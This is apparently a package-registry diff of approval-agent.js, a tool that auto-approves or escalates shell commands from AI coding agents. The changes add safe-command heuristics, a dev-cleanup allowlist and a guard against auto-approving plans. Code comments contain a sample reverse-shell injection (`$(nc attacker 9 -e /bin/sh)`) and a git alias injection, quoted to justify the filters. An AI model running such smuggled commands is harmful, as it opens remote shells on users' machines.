npm - create-walle - Versions diffs - 0.9.25 → 0.9.26 - Mend

create-walle 0.9.25 → 0.9.26

This diff represents the content of publicly available package versions that have been released to one of the supported registries. The information contained in this diff is provided for informational purposes only and reflects changes between package versions as they appear in their respective public registries.

Files changed (179) hide show

package/template/claude-task-manager/approval-agent.js CHANGED Viewed

@@ -218,6 +218,18 @@ function _scheduleGuardedApproval(session, context, headlessWorker, broadcastFn,
 const _lastApproval = new Map(); // sessionId -> { fingerprint, ts }
 const DEDUP_WINDOW_MS = 3000;
+// User-input priority: when the human is actively driving a session (typing/arrowing at a
+// prompt), the auto-approver must NOT inject keystrokes — its `y`/Enter/backspace would
+// interleave with the user's arrow sequences and steal/garble navigation. handleInput marks
+// the session active via markUserActive(); sendApprovalKeystroke yields within the backoff.
+const _userActiveAt = new Map(); // sessionId -> ts (ms) of last manual keystroke
+const USER_BACKOFF_MS = Math.max(0, Number(process.env.CTM_APPROVER_USER_BACKOFF_MS ?? 1500));
+function _userIsDriving(sessionId) {
+  if (!sessionId || USER_BACKOFF_MS <= 0) return false;
+  const at = _userActiveAt.get(sessionId);
+  return !!at && (Date.now() - at) < USER_BACKOFF_MS;
+}
 // Determine which option to send — delegates to provider if available,
 // falls back to Claude Code behavior ("2" for allow-all, "1" for plain Yes).
 function getApproveKeystroke(context, options = {}) {
@@ -391,7 +403,15 @@ function parseApprovalContext(cleanText, providerId) {
     if (fileOp) { toolName = fileOp.toolName; fileOpCommand = fileOp.command; }
   }
-  const command = (fileOpCommand || contextLines.join('\n')).trim();
+  // Bash approvals render the command followed by one dimmed prose description
+  // line; drop it from the command so titles/signatures stay command-shaped
+  // (mirror of the claude-code provider parse path).
+  let cmdLines = contextLines;
+  if (/^[⏺●]?\s*Bash\b/.test(toolName)) {
+    const cc = getProvider('claude-code');
+    if (cc && typeof cc.stripBashDescriptionTail === 'function') cmdLines = cc.stripBashDescriptionTail(contextLines);
+  }
+  const command = (fileOpCommand || cmdLines.join('\n')).trim();
   // Build focused context: tool header + command + warning + prompt (not the whole screen)
   const ctxStart = Math.max(0, endIdx - (contextLines.length + 1));
@@ -484,6 +504,75 @@ function isLiveApprovalPrompt(cleanText) {
   return false;
 }
+// A Claude ExitPlanMode plan-approval ("…written up a plan and is ready to
+// proceed?" with the plan-flow options) is the USER's deliberate plan decision,
+// NOT a tool permission. CTM must stay fully hands-off: never auto-press a key
+// (pressing "1" = "Yes, and use auto mode" auto-runs the WHOLE plan) and never
+// raise the approval banner. The session still surfaces via the normal Needs-You
+// signal. The generic wait-state classifier already tags these as a `choice`,
+// but plan approvals are high-stakes, so this dedicated guard is applied on the
+// main + rescue paths as defense-in-depth.
+//
+// Tight on purpose — requires BOTH a plan-flavored proceed question AND a
+// plan-specific option/footer tell — so a genuine "Do you want to proceed?" Bash
+// approval (a real permission, with plain "1. Yes / 2. No") is NOT swallowed.
+const PLAN_APPROVAL_QUESTION_RE = /\b(?:written up a plan|ready to proceed|(?:would you like|do you want|like) to proceed)\b/i;
+const PLAN_APPROVAL_OPTION_RE = /\byes,?\s*and\s*(?:use\s*)?auto[- ]?(?:mode|accept)|manually approve edits|(?:no,?\s*(?:and\s*)?)?keep planning|refine with\b|approve with this feedback|shift\+tab to approve\b/i;
+function isPlanApprovalPrompt(cleanText) {
+  const text = String(cleanText || '');
+  if (!text.trim()) return false;
+  return PLAN_APPROVAL_QUESTION_RE.test(text) && PLAN_APPROVAL_OPTION_RE.test(text);
+}
+// Content-addressed fingerprint of a visible ExitPlanMode plan card, used to
+// drive the server's convergence render ("keep pushing a clean snapshot until a
+// frame carrying THIS card has reached the clients"). It must be:
+//   - DISTINCT per plan (so a new plan re-renders, never deduped against an old
+//     one) → we hash the whole card region, including the plan body text, not
+//     just the static option labels (which collide across plans); and
+//   - STABLE across the live spinner / token counter / elapsed-time churn (so a
+//     settled card is not re-pushed every frame) → we mask those volatile bits
+//     before hashing.
+// Expects ANSI-stripped text. Returns null when no plan card is present.
+const PLAN_FP_VOLATILE_RES = [
+  /\(\s*\d+\s*m\s*\d+\s*s\s*\)/g,            // elapsed "(5m 50s)"
+  /\b[\d.,]+\s*k?\s*tokens?\b/gi,             // "22.7k tokens"
+  /\besc to interrupt\b/gi,                   // composer footer churn
+  /[⠀-⣿◐◓◑◒·✢✳✻✽∗⋆]/g,             // braille + asterisk spinner glyphs
+  /\b\d{1,2}:\d{2}(?::\d{2})?\b/g,            // clocks
+];
+// Shared volatile-masked djb2 hash of a card region (cheap, collision-safe enough for
+// frame identity). Masks the spinner / token counter / elapsed-time / clock churn so a
+// settled card is not re-pushed every frame.
+function _maskedCardHash(cleanText) {
+  let norm = String(cleanText || '');
+  for (const re of PLAN_FP_VOLATILE_RES) norm = norm.replace(re, ' ');
+  norm = norm.replace(/\s+/g, ' ').trim().toLowerCase();
+  let h = 5381;
+  for (let i = 0; i < norm.length; i++) h = (((h << 5) + h) ^ norm.charCodeAt(i)) >>> 0;
+  return h.toString(16);
+}
+function planCardFingerprint(cleanText) {
+  const text = String(cleanText || '');
+  if (!isPlanApprovalPrompt(text)) return null;
+  return 'plan-' + _maskedCardHash(text);
+}
+// General selection-card identity for the convergence render: AskUserQuestion menus,
+// permission prompts, and any other interactive card. UNLIKE planCardFingerprint, this
+// does NOT decide whether a card is present — the CALLER establishes that via the proven
+// structural classifier (lib/wait-state.js evaluateWaitState → kind 'choice'/'approval',
+// which is position-based and footer-agnostic, so it fires even when an 'esc to interrupt'
+// composer footer is co-painted). This just produces the stable, volatile-masked frame
+// identity the convergence render dedups on (distinct per card, stable across spinner churn).
+// Returns null only for empty text. Expects ANSI-stripped text.
+function cardTextFingerprint(cleanText) {
+  const text = String(cleanText || '');
+  if (!text.trim()) return null;
+  return 'card-' + _maskedCardHash(text);
+}
 // Normalize a command into a stable "signature" by extracting the command structure
 // and replacing variable parts (paths, strings, numbers) with placeholders.
 // Examples:
@@ -521,6 +610,10 @@ function normalizeCommandSignature(toolName, command) {
     .replace(/(["'`])(?:(?!\1).)*\1/g, '<arg>')
     // Replace URLs with <url>
     .replace(/https?:\/\/\S+/g, '<url>')
+    // Replace UUIDs (session SIDs etc.) with <id> BEFORE <num>, so a per-session
+    // id doesn't fragment the signature (the digit runs inside a UUID aren't
+    // \b-bounded, so <num> would leave it mostly literal and unique per run).
+    .replace(/\b[0-9a-f]{8}-[0-9a-f]{4}-[0-9a-f]{4}-[0-9a-f]{4}-[0-9a-f]{12}\b/gi, '<id>')
     // Replace absolute paths with <path>
     .replace(/(?:\/[\w._-]+){2,}/g, '<path>')
     // Replace standalone numbers (PIDs, ports, line numbers) with <num>
@@ -722,18 +815,6 @@ function escalationCommandParts(context) {
   return { title, signature };
 }
-// A rescue candidate is "actionable" only when we have a concrete command to show
-// the operator AND the parser classified the tool. An empty command or an
-// "Unknown" tool means the parse degraded (almost always approval-shaped PROSE,
-// not a live prompt) — escalating it just yields a confusing, meaningless banner.
-function _rescueCandidateActionable(context) {
-  if (!context) return false;
-  if (!escalationCommandParts(context).title) return false;
-  const tool = String(context.toolName || '').replace(/^[⏺●\s]+/, '').trim().toLowerCase();
-  if (!tool || tool === 'unknown') return false;
-  return true;
-}
 // The crisp, OBJECTIVE reason a command was sent to review instead of auto-approved
 // — a category + sentence, NOT the AI verifier's vague free-text. First match wins
 // (priority order). Shown in the session banner and the Pending group's "Why
@@ -892,6 +973,10 @@ function _splitShellClauses(cmd) {
     if (depth > 0) { buf += ch; continue; }
     if (ch === '\n' || ch === ';') { clauses.push(buf); buf = ''; continue; }
     if (ch === '&' || ch === '|') {
+      // A `&` that is part of a redirect (`2>&1`, `>&2`, `&>file`) is NOT a
+      // clause separator — splitting there manufactured a bogus `1` clause that
+      // forced common `… 2>&1 | …` commands to medium risk.
+      if (ch === '&' && (s[i - 1] === '>' || next === '>')) { buf += ch; continue; }
       // && || |& all consume two chars; single & or | consume one.
       if (next === ch || (ch === '|' && next === '&')) { i += 1; }
       clauses.push(buf); buf = ''; continue;
@@ -910,6 +995,136 @@ function _isProcessControlClause(clause) {
   return /\b(?:kill|pkill|killall)\b/.test(clause) || /\bxargs\b[\s\S]*\bkill\b/.test(clause);
 }
+// Pure shell control-flow keywords execute nothing on their own — they only
+// structure a loop/conditional. The clause splitter emits them as standalone
+// clauses (`for f in …`, `do`, `done`, `then`, `fi`, `esac`, …). Classifying them
+// as unknown COMMANDS used to force every looped command to 'medium' → the LLM
+// verifier, even when the loop body was entirely safe. They carry no risk by
+// themselves, so they are skipped like a bare assignment. The COMMANDS inside the
+// body are split into their own clauses and classified independently, so a
+// dangerous body (`do rm -rf /; done`, `do kill …; done`) still escalates — the
+// MAX-risk-per-clause invariant (and the whole-command high-risk scan above) is
+// untouched.
+function _isControlFlowClause(clause) {
+  const c = String(clause || '').trim();
+  if (!c) return true;
+  // Bare structural keywords / block punctuation (nothing executes).
+  if (/^(?:do|done|then|else|fi|esac|in|;;|\{|\})$/.test(c)) return true;
+  // Loop/conditional headers that introduce no command of their own:
+  //   `for VAR in LIST`, `case WORD in`. Skipped ONLY when the header contains no
+  //   command substitution ($(…) / backticks) — a substitution IS a real exec
+  //   vector and must stay classified, so such a header falls through to review.
+  if (/^for\s+\w+\s+in\b/.test(c) && !/\$\(|`/.test(c)) return true;
+  if (/^case\s+\S+\s+in\b/.test(c) && !/\$\(|`/.test(c)) return true;
+  return false;
+}
+// A real command can be glued to a leading control keyword by the splitter
+// (`do sips …`, `then make …`, `while read …`, `if test …`). Strip the keyword so
+// the body command itself is risk-classified, not the keyword. Process-control,
+// high-risk, and devSafe checks then apply to the actual command.
+function _stripLeadingControlKeyword(clause) {
+  return String(clause || '').replace(/^\s*(?:do|then|else|elif|while|until|if)\s+/, '');
+}
+// --- Dev-instance cleanup family -------------------------------------------
+// Stopping a local dev server and removing its /tmp scratch is a routine,
+// repeated action (lsof -ti :PORT | xargs kill ; rm -rf /tmp/<scratch>). On its
+// own each piece classifies 'medium' (kill = process control, rm = unrecognized)
+// so it parks the agent every time. These three helpers recognize ONLY that
+// narrow shape; anything broader (kill by name, kill -1, rm outside /tmp, a
+// `..` escape) does NOT match and falls through to the normal medium/high path.
+// Shell metacharacters that introduce EXECUTION or expansion: command/process
+// substitution ($(…) / `…` / <(…)), brace/arith expansion, redirects, subshells.
+// Any clause containing these is disqualified from the auto-approve allowlist —
+// otherwise `rm -rf /tmp/x$(nc attacker 9 -e /bin/sh)` would pass the /tmp-shape
+// check (the substitution is glued to a /tmp token with no whitespace) and the
+// embedded command would run. Pipes/semicolons are NOT here: the splitter
+// already breaks on them, so each clause is classified on its own. `*?[]` glob
+// chars are allowed (rm of /tmp/walle-stream*.txt is a normal cleanup).
+function _hasShellExecMetachars(s) {
+  return /[`$()<>{}\\]/.test(String(s || ''));
+}
+// `rm [-flags] <targets>` where EVERY target is strictly under /tmp/ (at least
+// one segment below /tmp, no bare /tmp, no `..` escape) and contains only safe
+// path/glob characters. Recursive is fine here — the blast radius is confined to
+// temp scratch. A substitution/expansion anywhere in the clause disqualifies it.
+function _isTmpScopedRmClause(clause) {
+  const c = String(clause || '').trim();
+  if (!/^rm\b/.test(c)) return false;
+  if (_hasShellExecMetachars(c)) return false;
+  const targets = [];
+  let flagsDone = false;
+  for (const tok of c.split(/\s+/).slice(1)) {
+    if (!flagsDone && tok === '--') { flagsDone = true; continue; }
+    if (!flagsDone && /^-/.test(tok)) continue;
+    targets.push(tok.replace(/^['"]|['"]$/g, ''));
+  }
+  if (!targets.length) return false;
+  return targets.every((t) => !/\/\.\.?(\/|$)/.test(t) && /^\/tmp\/[\w.\-/*?[\]]+$/.test(t));
+}
+// Port-scoped process termination: `lsof -ti :PORT | xargs kill [-SIG]` (fed by
+// the lsof producer in the same pipeline) or `kill [-SIG] <numeric pids>`. Never
+// matches a kill of process group/all (`-1`) or kill-by-name (pkill/killall).
+function _isPortScopedKillClause(clause) {
+  const c = String(clause || '').trim();
+  if (_hasShellExecMetachars(c)) return false;
+  if (/\bpkill\b|\bkillall\b/.test(c)) return false;
+  if (/\bkill\b[\s\S]*(?:^|\s)-1\b/.test(c)) return false; // kill … -1 (all/process-group)
+  if (/^xargs\b[\s\S]*\bkill\b/.test(c)) return true;      // PIDs arrive via stdin from lsof
+  const m = c.match(/^kill\b(.*)$/);
+  if (!m) return false;
+  const targets = m[1].trim().split(/\s+/).filter(Boolean).filter((a) => !a.startsWith('-'));
+  return targets.length > 0 && targets.every((a) => /^\d+$/.test(a));
+}
+// `lsof -ti :PORT` style PID producer (terse + by-port). Read-only; only useful
+// here as the safe left side of the port-kill pipeline.
+function _isDevPortLsofClause(clause) {
+  const c = String(clause || '').trim();
+  if (_hasShellExecMetachars(c)) return false;
+  return /^lsof\b/.test(c) && /-[a-z]*t/.test(c) && /:\d{2,5}\b/.test(c);
+}
+// True only when the WHOLE command is the dev-cleanup family: every clause is a
+// port-scoped kill, a /tmp-scoped rm, the lsof PID producer, a sleep, or an
+// inherently-harmless assignment/control-flow keyword. Deliberately NARROW so it
+// does not punch through the per-clause-max process-control guardrail (the
+// Cursor `&&`-allowlist-bypass CVE class): a kill clause only counts as cleanup
+// when the command ALSO contains an `lsof :PORT` producer (i.e. killing whatever
+// holds a local port) — a bare `kill -9 <pid>`, a kill mixed with any unrelated
+// command, or a kill-by-name (pkill/killall) all stay 'medium' → verifier.
+// Operates on the already-unwrapped, lowercased command.
+function _isDevCleanupCommand(cmd) {
+  const clauses = _splitShellClauses(cmd);
+  if (!clauses.length) return false;
+  let sawLsofPort = false, sawKill = false, sawTmpRm = false;
+  for (const raw of clauses) {
+    const c = _stripLeadingControlKeyword(raw).trim();
+    if (!c) continue;
+    // Any exec metacharacter ($()/`…`/<()/>()/{}/subshell/redirect) disqualifies
+    // the whole command BEFORE the harmless-looking skips below — otherwise a
+    // clause like `FOO=<(nc …)` (skipped as a bare assignment) or a redirect to
+    // an arbitrary file would smuggle execution into an auto-approved teardown.
+    if (_hasShellExecMetachars(c)) return false;
+    if (_isControlFlowClause(c)) continue;
+    if (/^\w+=/.test(c) && !/\$\((?!\()/.test(c) && !/`/.test(c)) continue; // bare assignment
+    if (/^sleep\s+[\d.]+\s*$/.test(c)) continue;
+    if (_isDevPortLsofClause(c)) { sawLsofPort = true; continue; }
+    if (_isPortScopedKillClause(c)) { sawKill = true; continue; }
+    if (_isTmpScopedRmClause(c)) { sawTmpRm = true; continue; }
+    return false; // any other clause disqualifies the whole command
+  }
+  // A kill only qualifies as dev-cleanup when paired with an lsof port producer;
+  // otherwise it stays medium (the process-control guardrail). A pure /tmp-scoped
+  // rm needs no lsof — its blast radius is confined to scratch.
+  if (sawKill && !sawLsofPort) return false;
+  return sawKill || sawTmpRm;
+}
 // Simple heuristic review when no API key is available
 function reviewWithHeuristics(context) {
   const cmd = (context.command || '').toLowerCase();
@@ -983,6 +1198,16 @@ function reviewWithHeuristics(context) {
     }
   }
+  // Dev-instance cleanup family (stop a local dev server + delete its /tmp
+  // scratch). Recognized as a WHOLE-command shape so the port-scoped kill and
+  // the /tmp-scoped rm — which each look 'medium' in isolation — don't park the
+  // agent on every teardown. Runs AFTER the high-risk scan (so a non-/tmp rm or
+  // sudo still wins) and the dangerous-command blocklist remains the hard floor.
+  if (_isDevCleanupCommand(cmdUnwrapped || cmd)) {
+    return { decision: 'approve', reasoning: 'Dev-instance cleanup — port-scoped kill + /tmp scratch removal (heuristic)', riskLevel: 'low',
+      ruleLabel: 'Dev cleanup', rulePattern: '', ruleDescription: 'Stop a local dev server (lsof :PORT | xargs kill) and remove its /tmp scratch files' };
+  }
   // Local dev operations that are safe to auto-approve — matched PER CLAUSE.
   const devSafe = [
     { re: /echo\s+.*>\s*\/tmp\//, label: 'Write to /tmp', desc: 'Echo output to temp files' },
@@ -991,7 +1216,17 @@ function reviewWithHeuristics(context) {
     { re: /\bcat\s/, label: 'Read file contents', desc: 'View file contents with cat' },
     { re: /\bls\b/, label: 'List directory', desc: 'List files and directories' },
     { re: /\bpwd\b/, label: 'Print working directory', desc: 'Show current directory path' },
-    { re: /git\s+(status|log|diff|branch|show|stash\s+list|tag|remote)/, label: 'Git read operations', desc: 'Read-only git commands (status, log, diff, branch, show, tag, remote)' },
+    // Read-only git, tolerant of git's leading global options so `git -C <repo>
+    // status` classifies the same as `git status` (matches Claude Code / Codex).
+    // Only KNOWN-SAFE global options are skipped: `-C`/`--git-dir`/`--work-tree`/
+    // `--namespace` (+ value) and pager/lock booleans. Exec-affecting options
+    // (`-c name=value`, `--config-env`, `--exec-path`) are deliberately excluded,
+    // so `git -c alias.x='!cmd' x` does NOT match here and stays medium-risk.
+    // caseSensitive: matched against the ORIGINAL-case clause. git's `-C`
+    // (directory, safe) and `-c` (config/alias injection) collapse to the same
+    // token under toLowerCase(), so this rule must see the real case to keep
+    // `-c alias.x='!cmd'` out of the read-only class.
+    { re: /\bgit\s+(?:(?:-C|--git-dir|--work-tree|--namespace)(?:=\S+|\s+\S+)\s+|(?:-p|-P|--paginate|--no-pager|--bare|--no-replace-objects|--literal-pathspecs|--glob-pathspecs|--noglob-pathspecs|--icase-pathspecs|--no-optional-locks|--no-advice)\s+)*(?:status|log|diff|branch|show|stash\s+list|tag|remote)\b/, caseSensitive: true, label: 'Git read operations', desc: 'Read-only git commands (status, log, diff, branch, show, tag, remote)' },
     // NOTE: `node -e`, `python -c`, `cp`, `mv`, and `sqlite3` are intentionally
     // NOT here — they can run arbitrary code or mutate/overwrite arbitrary files
     // (incl. databases) and must go through the AI reviewer/verifier (medium),
@@ -1001,7 +1236,8 @@ function reviewWithHeuristics(context) {
     { re: />\s*\/tmp\//, label: 'Write to /tmp', desc: 'Redirect output to temp files' },
     { re: /touch\s/, label: 'Create empty file', desc: 'Create or update file timestamps' },
     { re: /\bcurl\s[\s\S]*?(https?:\/\/localhost|http:\/\/127\.0\.0\.1)/, label: 'Curl localhost', desc: 'HTTP requests to local dev servers' },
-    { re: /grep\s+-?[crn]/, label: 'Grep search', desc: 'Search file contents with grep' },
+    // grep/egrep/fgrep/ripgrep are read-only regardless of flags (-i/-v/-q/-c…).
+    { re: /\b(?:(?:e|f)?grep|rg)\b/, label: 'Grep search', desc: 'Search file contents with grep/ripgrep' },
     { re: /wc\s/, label: 'Word count', desc: 'Count lines/words/bytes' },
     { re: /head\s|tail\s/, label: 'Read file head/tail', desc: 'View beginning or end of files' },
     { re: /which\s|type\s/, label: 'Find command', desc: 'Locate commands in PATH' },
@@ -1025,18 +1261,41 @@ function reviewWithHeuristics(context) {
   // unrecognized makes the whole command 'medium' → AI reviewer/verifier (which,
   // with session context, can still auto-approve a goal-aligned action).
   const clauses = _splitShellClauses(cmdUnwrapped || cmd);
+  // Original-case clauses, parallel to `clauses`, for rules flagged
+  // caseSensitive (case is security-relevant for git's -C vs -c). Splitting is
+  // case-independent, so indices line up 1:1.
+  const cmdRawUnwrapped = String(context.command || '')
+    .replace(/^(#[^\n]*\n\s*)*/, '')
+    .replace(/^(time|env|nice|nohup|command)\s+/gi, '');
+  const clausesRaw = _splitShellClauses(cmdRawUnwrapped);
   let firstSafe = null;
   let review = null;
-  for (const clause of clauses) {
+  // Tracks that at least one clause was skipped as inherently harmless (a bare
+  // assignment or pure control-flow keyword). Used so a command made ENTIRELY of
+  // such clauses (e.g. `DEV_CTM_PORT=4856; DEV_WALLE_PORT=4857`) classifies low
+  // instead of falling through to the medium default — it executes nothing.
+  let skippedSafe = false;
+  for (let ci = 0; ci < clauses.length; ci += 1) {
+    let clause = clauses[ci];
+    let clauseRaw = clausesRaw[ci] != null ? clausesRaw[ci] : clause;
+    // Control-flow structure (for/do/done/then/fi/esac/…) executes nothing on its
+    // own — skip it so a loop of safe commands is not forced to 'medium' by the
+    // loop keywords. The body commands are still classified as their own clauses.
+    if (_isControlFlowClause(clause)) { skippedSafe = true; continue; }
+    // A leading control keyword can be glued onto a real command by the splitter
+    // (`do sips …`); strip it so the body command — not the keyword — is judged.
+    clause = _stripLeadingControlKeyword(clause);
+    clauseRaw = _stripLeadingControlKeyword(clauseRaw);
+    if (!clause.trim()) continue;
     // A bare assignment with no command substitution just sets a variable
     // (literal or arithmetic) — harmless. `VAR=$(cmd)` keeps the inner command,
     // so it falls through to be classified by that command below.
-    if (/^\w+=/.test(clause) && !/\$\((?!\()/.test(clause) && !/`/.test(clause)) continue;
+    if (/^\w+=/.test(clause) && !/\$\((?!\()/.test(clause) && !/`/.test(clause)) { skippedSafe = true; continue; }
     if (_isProcessControlClause(clause)) {
       review = review || { label: 'Process control', desc: 'Terminates processes (kill/pkill) — review the target' };
       continue;
     }
-    const safe = devSafe.find(({ re }) => re.test(clause));
+    const safe = devSafe.find(({ re, caseSensitive }) => re.test(caseSensitive ? clauseRaw : clause));
     if (safe) { firstSafe = firstSafe || safe; continue; }
     review = review || { label: context.toolName || 'Bash command', desc: 'Routed to AI reviewer/verifier for a decision' };
   }
@@ -1048,6 +1307,12 @@ function reviewWithHeuristics(context) {
     return { decision: 'approve', reasoning: 'Common dev operation (heuristic, all clauses safe)', riskLevel: 'low',
       ruleLabel: firstSafe.label, rulePattern: firstSafe.re.source, ruleDescription: firstSafe.desc };
   }
+  // Every clause was an inherently-harmless assignment / control-flow keyword and
+  // nothing executed — low risk (e.g. `DEV_CTM_PORT=4856; DEV_WALLE_PORT=4857`).
+  if (skippedSafe) {
+    return { decision: 'approve', reasoning: 'Variable assignment / control-flow only (executes nothing)', riskLevel: 'low',
+      ruleLabel: 'Variable assignment', rulePattern: '', ruleDescription: 'Sets shell variables / control-flow keywords only' };
+  }
   // Default: medium risk — NOT auto-approved here. Routed to the AI reviewer +
   // verifier; if the AI gate is unavailable it escalates to the user (fail-safe).
@@ -1190,6 +1455,15 @@ const BACKSPACE = '\x7f';
 // Legacy path (no headlessWorker, e.g. unit tests): keep original
 // keystroke + ENTER_DELAY_MS Enter behavior so existing tests still pass.
 function sendApprovalKeystroke(session, context, headlessWorker, options = {}) {
+  // User-input priority: if the human is actively interacting with this session's prompt,
+  // yield — do not inject. This is checked at fire-time (covers both immediate and the
+  // setTimeout-deferred guarded path) so a keystroke the user just started navigating is
+  // left alone. Steady-state auto-approval (no recent manual input) is unaffected.
+  if (session && _userIsDriving(session.id)) {
+    const sid = session.id ? session.id.slice(0, 8) : '?';
+    console.log(`[approval-agent] Skipping injection for session ${sid} — user is actively driving (backoff ${USER_BACKOFF_MS}ms)`);
+    return;
+  }
   const provider = context.providerId ? getProvider(context.providerId) : null;
   const keystroke = options.keystroke || getApproveKeystroke(context, options);
   const sid = session.id ? session.id.slice(0, 8) : '?';
@@ -1549,6 +1823,11 @@ async function handleApprovalRescueCandidate(sessionId, session, cleanText, broa
   const rawText = String(cleanText || meta.rawText || '');
   if (!rawText) return { handled: false, reason: 'empty' };
+  // Fully hands-off on plan approvals (ExitPlanMode). Never parse-for-command,
+  // never keystroke, never banner — pressing a key here can auto-run the plan,
+  // and the "command" would just be plan prose. The session stays Needs-You.
+  if (isPlanApprovalPrompt(rawText)) return { handled: false, reason: 'plan-approval' };
   const providerContext = _parseKnownProviderContext(rawText, providerId);
   let context = providerContext?.context || parseApprovalContext(rawText, providerId);
   if (!context && providerId) context = parseApprovalContext(rawText, null);
@@ -1642,14 +1921,13 @@ async function handleApprovalRescueCandidate(sessionId, session, cleanText, broa
     row.ruleLabel = review.ruleLabel || row.ruleLabel;
     row.ruleDescription = review.ruleDescription || row.ruleDescription;
     row = _saveRescuePattern(row) || row;
-    // Only pin a "review needed" banner when there is a concrete, classified
-    // command to show the operator. A non-actionable candidate (no parsed command
-    // or an unclassified "Unknown" tool) is almost always approval-shaped PROSE,
-    // not a live prompt — escalating it produces a confusing, meaningless banner.
-    // The refinement loop (handleMiss) still runs separately and learns the shape.
-    if (review.shouldWarnUser && _rescueCandidateActionable(context)) {
-      _broadcastRescueWarning(sessionId, session, broadcastFn, context, review, row);
-    }
+    // The rescue-monitor's own "I think I missed an approval" verdict is NOT
+    // surfaced as the front-and-center approval banner — that channel is reserved
+    // for genuine approvals the user can act on (blocklist/deny/verifier
+    // escalations + hook-park + the reconcile settled-frame path). A real missed
+    // prompt is still on screen and surfaces via Needs-You/reconcile; the rescue
+    // verdict only updates the (silent) suppressed-pattern record above.
+    console.log(`[approval-rescue] not-safe (silent) session=${sessionId.slice(0, 8)} diagnosis=${diagnosis || 'unknown'} label="${(escalationCommandParts(context).title || context.toolName || '').slice(0, 80)}"`);
     return { handled: false, reason: 'not-safe', fingerprint, decidedBy: review.decidedBy, diagnosis };
   }
@@ -1765,10 +2043,12 @@ async function handleApprovalRescueCandidate(sessionId, session, cleanText, broa
     : RESCUE_RETRY_COOLDOWN_MS);
   if (row.consecutiveFailures >= RESCUE_MAX_CONSECUTIVE_FAILURES) row.status = 'blocked';
   row = _saveRescuePattern(row) || row;
-  _broadcastRescueWarning(sessionId, session, broadcastFn, context, {
-    ...review,
-    reasoning: `CTM tried to auto-approve a missed prompt, but the terminal did not advance (${outputAdvanced} bytes).`,
-  }, row);
+  // Verify-failed is recorded (suppressed pattern, above) but NOT surfaced as the
+  // approval banner — the genuine prompt is still on screen and surfaces via the
+  // normal Needs-You / reconcile path. The old "CTM tried to auto-approve a missed
+  // prompt, but the terminal did not advance" banner was meta-noise about CTM's
+  // internals, not an approvable permission.
+  console.log(`[approval-rescue] verify-failed (silent) session=${sessionId.slice(0, 8)} advanced=${outputAdvanced}B label="${(escalationCommandParts(context).title || context.toolName || '').slice(0, 80)}"`);
   return {
     handled: true,
     reason: 'verify-failed',
@@ -1799,9 +2079,13 @@ async function decideApproval(context, session, options = {}) {
   const callModel = options.callModel || null;
   const command = context.command || '';
-  // 1) Dangerous-command blocklist — runs first, never overridden by other signals.
+  // 1) Dangerous-command blocklist — runs first, never overridden by other signals
+  //    (except the user's own "never block" exceptions, which we audit-log).
   if (isBlocklistEnabled()) {
     const block = checkBlocklist(command, getBlocklistConfig());
+    if (block.exempted) {
+      console.log(`[approval-agent] blocklist exception ${block.exceptionId} suppressed "${block.suppressed?.reason}" for cmd="${command.slice(0, 200)}"`);
+    }
     if (block.blocked) {
       return {
         decision: 'ask', decidedBy: 'blocklist', riskLevel: 'high',
@@ -1823,15 +2107,23 @@ async function decideApproval(context, session, options = {}) {
     };
   }
   const userAllowed = !!(permMatch && permMatch.action === 'allow');
+  const viaException = userAllowed ? permMatch.viaException : null;
+  if (viaException) {
+    console.log(`[approval-agent] deny rule ${permMatch.rule} excepted (${viaException.type}: ${viaException.value}) for cmd="${command.slice(0, 200)}"`);
+  }
   // 3) Learned rules / per-clause heuristic risk classification.
   const matchingRule = findMatchingRule(context);
   const heuristic = matchingRule ? null : reviewWithHeuristics(context);
   const riskLevel = matchingRule ? (matchingRule.risk_level || 'low') : (heuristic ? (heuristic.riskLevel || 'low') : 'low');
   const decidedBy = userAllowed ? 'user-allow' : (matchingRule ? 'rule' : 'auto');
-  const label = userAllowed ? `Allowed: ${permMatch.rule}`
+  const label = userAllowed
+    ? (viaException ? `Excepted from ${permMatch.rule} (${viaException.value})` : `Allowed: ${permMatch.rule}`)
     : matchingRule ? matchingRule.label : ((heuristic && heuristic.ruleLabel) || context.toolName);
-  const reason = userAllowed ? `Permission Manager allow rule matched: ${permMatch.rule}`
+  const reason = userAllowed
+    ? (viaException
+        ? `Deny rule ${permMatch.rule} excepted (${viaException.type} ${viaException.value})`
+        : `Permission Manager allow rule matched: ${permMatch.rule}`)
     : matchingRule ? `Matched learned rule: ${matchingRule.label}`
     : 'Auto-approved by default (not on the denylist)';
@@ -1884,19 +2176,26 @@ async function handleApprovalCheck(sessionId, session, cleanText, broadcastFn, p
   // never auto-approved regardless of what other signals say. Opt-in.
   if (isBlocklistEnabled()) {
     const blockCheck = checkBlocklist(context.command || '', getBlocklistConfig());
+    if (blockCheck.exempted) {
+      console.log(`[approval-agent] blocklist exception ${blockCheck.exceptionId} suppressed "${blockCheck.suppressed?.reason}" session=${sessionId} cmd="${(context.command || '').slice(0, 200)}"`);
+    }
     if (blockCheck.blocked) {
       console.log(`[approval-agent] BLOCKLIST hit session=${sessionId} category=${blockCheck.category} reason="${blockCheck.reason}" cmd="${(context.command || '').slice(0, 200)}"`);
+      // The Pending card titles from commandSummary — use the operative COMMAND
+      // (what the user must judge), not the blocklist reason. The reason stays
+      // in `reasoning` ("Why escalated" + isBlocklistGroup detection).
+      const parts = escalationCommandParts(context);
       const decision = {
         sessionId,
         toolName: context.toolName,
-        commandSummary: `Blocklist: ${blockCheck.reason}`,
+        commandSummary: parts.title || `Blocklist: ${blockCheck.reason}`,
         fullContext: context.fullContext.slice(0, 2000),
         warning: context.warning,
         decision: 'escalated',
         reasoning: `Dangerous-command blocklist matched (${blockCheck.category}): ${blockCheck.reason}`,
         decidedBy: 'blocklist',
         riskLevel: 'high',
-        commandSignature,
+        commandSignature: parts.signature || commandSignature,
       };
       let decisionId;
       try { decisionId = dbModule.addApprovalDecision(decision); } catch (e) { console.error('[approval-agent] DB error:', e.message); }
@@ -1930,10 +2229,13 @@ async function handleApprovalCheck(sessionId, session, cleanText, broadcastFn, p
   if (permMatch && permMatch.action === 'deny') {
     const reasoning = `Permission Manager deny rule matched: ${permMatch.rule}`;
     try {
+      const parts = escalationCommandParts(context);
       dbModule.addApprovalDecision({
-        sessionId, toolName: context.toolName, commandSummary: `Denied: ${permMatch.rule}`,
+        sessionId, toolName: context.toolName,
+        commandSummary: parts.title || `Denied: ${permMatch.rule}`,
         fullContext: context.fullContext.slice(0, 2000), warning: context.warning,
-        decision: 'escalated', reasoning, decidedBy: 'user-deny', riskLevel: 'high', commandSignature,
+        decision: 'escalated', reasoning, decidedBy: 'user-deny', riskLevel: 'high',
+        commandSignature: parts.signature || commandSignature,
       });
